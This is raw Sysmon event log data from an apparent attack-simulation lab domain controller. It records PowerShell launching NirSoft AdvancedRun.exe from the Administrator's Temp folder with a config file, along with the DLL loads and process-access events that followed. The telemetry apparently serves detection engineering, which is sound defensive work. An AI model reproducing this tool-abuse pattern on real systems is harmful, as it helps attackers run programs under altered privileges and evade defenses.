Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007767Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.005{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64win.dll10.0.14393.3383 (rs1_release.191125-1816)Wow64 Console and Win32 API LoggingMicrosoft® Windows® Operating SystemMicrosoft Corporationwow64lg2.dllMD5=62DEBA17D0A26B352F1C3F02144BC6EA,SHA256=5A1C08FE318942CB31048DBD641E25610DE842E34470B3E54FEDCA4E2642D4E0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007766Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:06.005{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64.dll10.0.14393.3503 (rs1_release.200131-0410)Win32 Emulation on NT64Microsoft® Windows® Operating SystemMicrosoft Corporationwow64.dllMD5=447615F19DAAFF9C308370C59F493BF8,SHA256=45ED2009CEEB249BBF518B958AF02B97E667DB68C9B6D65642E69E9B0300CF5DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007765Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.005{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F77A39FFEEFDA237A5730A71A2EB3B83,SHA256=A4D72013A219DA259858A19C3A2807FF88C1E874621AEF666D05C65E9257C9B3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007764Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.005{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F0A74A939E7B2E1C0B392CEB2D3EB71B,SHA256=CD6382FF8FDEF8C08C62576D80C981E6E1C966E95874007EFE047BD136BF954CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007763Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.005{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you 
choose.AdvancedRunNirSoftAdvancedRun.exeMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8trueNir SoferValidATTACKRANGE\Administrator 10341000x80000000000000004007762Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.005{834264DD-DAF8-61EA-5B00-000000002702}41005552C:\Windows\system32\csrss.exe{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004007761Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.005{834264DD-E497-61EA-F301-000000002702}9444688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+15c0099|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\Na
734700x80000000000000004007587Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:52.972{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007586Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:52.972{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007585Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:52.972{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64win.dll10.0.14393.3383 (rs1_release.191125-1816)Wow64 Console and Win32 API LoggingMicrosoft® Windows® Operating SystemMicrosoft Corporationwow64lg2.dllMD5=62DEBA17D0A26B352F1C3F02144BC6EA,SHA256=5A1C08FE318942CB31048DBD641E25610DE842E34470B3E54FEDCA4E2642D4E0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007584Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:39:52.972{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64.dll10.0.14393.3503 (rs1_release.200131-0410)Win32 Emulation on NT64Microsoft® Windows® Operating SystemMicrosoft Corporationwow64.dllMD5=447615F19DAAFF9C308370C59F493BF8,SHA256=45ED2009CEEB249BBF518B958AF02B97E667DB68C9B6D65642E69E9B0300CF5DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007583Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:52.972{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F77A39FFEEFDA237A5730A71A2EB3B83,SHA256=A4D72013A219DA259858A19C3A2807FF88C1E874621AEF666D05C65E9257C9B3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007582Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:52.972{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F0A74A939E7B2E1C0B392CEB2D3EB71B,SHA256=CD6382FF8FDEF8C08C62576D80C981E6E1C966E95874007EFE047BD136BF954CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007581Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:52.972{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you 
choose.AdvancedRunNirSoftAdvancedRun.exeMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8trueNir SoferValidATTACKRANGE\Administrator 10341000x80000000000000004007580Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:52.972{834264DD-DAF8-61EA-5B00-000000002702}41005552C:\Windows\system32\csrss.exe{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004007579Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:52.957{834264DD-E497-61EA-F301-000000002702}9444688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+15c0099|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\Na
tiveImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a459b1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a366d1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43c13|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43785|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a283d8|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a2794aATTAC
KRANGE\AdministratorATTACKRANGE\Administrator 154100x80000000000000004007578Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:52.967{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /cfg C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.cfgC:\Users\Administrator\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 534500x80000000000000003988661Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:42.786{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeATTACKRANGE\Administrator 10341000x80000000000000003988642Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:06:39.707{834264DD-DB11-61EA-9500-000000002702}4283132C:\Windows\Explorer.EXE{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003988641Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:39.707{834264DD-DB11-61EA-9500-000000002702}4283132C:\Windows\Explorer.EXE{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6263e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003988640Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:06:39.707{834264DD-DB11-61EA-9500-000000002702}4283132C:\Windows\Explorer.EXE{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003988619Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:32.099{834264DD-DB11-61EA-9500-000000002702}4283132C:\Windows\Explorer.EXE{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003988618Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:06:32.099{834264DD-DB11-61EA-9500-000000002702}4283132C:\Windows\Explorer.EXE{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6263e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003988617Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:32.099{834264DD-DB11-61EA-9500-000000002702}4283132C:\Windows\Explorer.EXE{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003988616Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:06:32.099{834264DD-DB11-61EA-9500-000000002702}4281808C:\Windows\Explorer.EXE{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003988614Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:32.099{834264DD-DB11-61EA-9500-000000002702}4281808C:\Windows\Explorer.EXE{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6263e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003988612Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:06:32.099{834264DD-DB11-61EA-9500-000000002702}4281808C:\Windows\Explorer.EXE{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003988611Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:32.099{834264DD-DB11-61EA-9500-000000002702}4281808C:\Windows\Explorer.EXE{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003988610Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:06:32.068{834264DD-DB10-61EA-9000-000000002702}33365092C:\Windows\System32\taskhostw.exe{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003988609Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:32.068{834264DD-DB10-61EA-9000-000000002702}33365092C:\Windows\System32\taskhostw.exe{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003988608Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:32.068{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62db0|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003988607Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
